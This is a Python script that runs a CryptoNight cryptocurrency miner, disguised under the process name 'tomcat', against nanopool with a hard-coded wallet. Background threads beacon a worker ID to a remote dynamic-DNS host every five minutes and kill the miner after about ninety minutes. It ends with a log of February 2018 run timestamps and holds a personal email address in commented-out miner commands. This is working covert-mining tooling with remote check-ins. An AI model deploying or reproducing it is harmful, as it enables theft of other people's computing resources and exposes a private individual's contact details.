import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:07.461910
#2018-02-17 16:48:06.051809
#2018-02-17 18:36:04.217148
#2018-02-17 20:24:03.449519
#2018-02-17 22:11:07.116977
#2018-02-17 23:55:06.043388
#2018-02-18 01:46:01.733188
#2018-02-18 03:34:02.165452
#2018-02-18 05:21:05.905902
#2018-02-18 07:12:04.663673
#2018-02-18 08:59:07.289157
#2018-02-18 10:46:06.008278
#2018-02-18 12:33:04.746553
#2018-02-18 14:20:03.035635
#2018-02-18 16:10:08.161887
#2018-02-18 17:58:04.655984
#2018-02-18 19:44:07.206198
#2018-02-18 21:28:06.194561
#2018-02-18 23:17:06.578718
#2018-02-19 01:04:03.268160
#2018-02-19 02:51:05.962157
#2018-02-19 04:38:05.072303
#2018-02-19 06:22:04.613602
#2018-02-19 08:11:05.886752
#2018-02-19 10:01:05.957003
#2018-02-19 11:50:02.588932
#2018-02-19 13:37:01.368528
#2018-02-19 15:24:04.986514
#2018-02-19 17:12:09.493578
#2018-02-19 19:02:01.582537
#2018-02-19 20:47:06.058419
#2018-02-19 22:35:05.933849
#2018-02-20 00:20:06.403028
#2018-02-20 02:08:01.513448
#2018-02-20 03:57:01.531687
#2018-02-20 05:41:04.920809
#2018-02-20 07:26:08.459801
#2018-02-20 09:11:04.967502
#2018-02-20 10:54:07.094964
#2018-02-20 12:41:08.870500
#2018-02-20 14:26:08.845043
#2018-02-20 16:10:09.946413
#2018-02-20 17:55:04.236638
#2018-02-20 19:45:12.525655
#2018-02-20 21:36:06.728096
#2018-02-20 23:17:05.624414
#2018-02-21 01:01:05.275573
#2018-02-21 02:47:07.562341
#2018-02-21 04:36:05.999568
#2018-02-21 06:24:06.035444
#2018-02-21 08:09:06.972587
#2018-02-21 09:54:07.090238
#2018-02-21 11:43:07.571990
#2018-02-21 13:34:01.393212
#2018-02-21 15:19:01.790565
#2018-02-21 17:09:11.256157
#2018-02-21 18:56:07.606274
#2018-02-21 20:45:03.377471
#2018-02-21 22:29:04.676221
#2018-02-22 00:18:08.645955
#2018-02-22 02:07:07.184756
#2018-02-22 03:52:07.019795
#2018-02-22 05:38:01.740699
#2018-02-22 07:22:05.527706
#2018-02-22 09:09:06.744731
#2018-02-22 10:57:06.419447
#2018-02-22 12:42:08.686252
#2018-02-22 14:28:02.176137
#2018-02-22 16:14:05.455153
#2018-02-22 17:59:04.899199
#2018-02-22 19:48:12.864800
#2018-02-22 21:38:03.992225
#2018-02-22 23:25:08.227665
#2018-02-23 01:12:08.962405
#2018-02-23 02:58:03.406943
#2018-02-23 04:44:04.241154
#2018-02-23 06:35:01.535834
#2018-02-23 08:22:07.727188
#2018-02-23 10:38:07.745235
#2018-02-23 12:32:06.964109
#2018-02-23 14:20:09.413541
#2018-02-23 16:11:07.265937
#2018-02-23 17:57:02.200375
#2018-02-23 19:43:01.411547
#2018-02-23 21:25:08.403025
#2018-02-23 23:13:03.992176
#2018-02-24 01:03:06.073555
#2018-02-24 02:56:03.907629
#2018-02-24 04:44:06.188456
#2018-02-24 06:31:06.179424
#2018-02-24 08:19:07.308966
#2018-02-24 10:03:07.898061
#2018-02-24 12:00:08.589911
#2018-02-24 13:48:01.600555
#2018-02-24 15:39:07.279749
#2018-02-24 17:33:06.022024
#2018-02-24 19:19:07.470690
#2018-02-24 21:09:07.640295
#2018-02-25 01:19:05.729974
#2018-02-25 05:20:06.012142
#2018-02-25 11:34:01.784682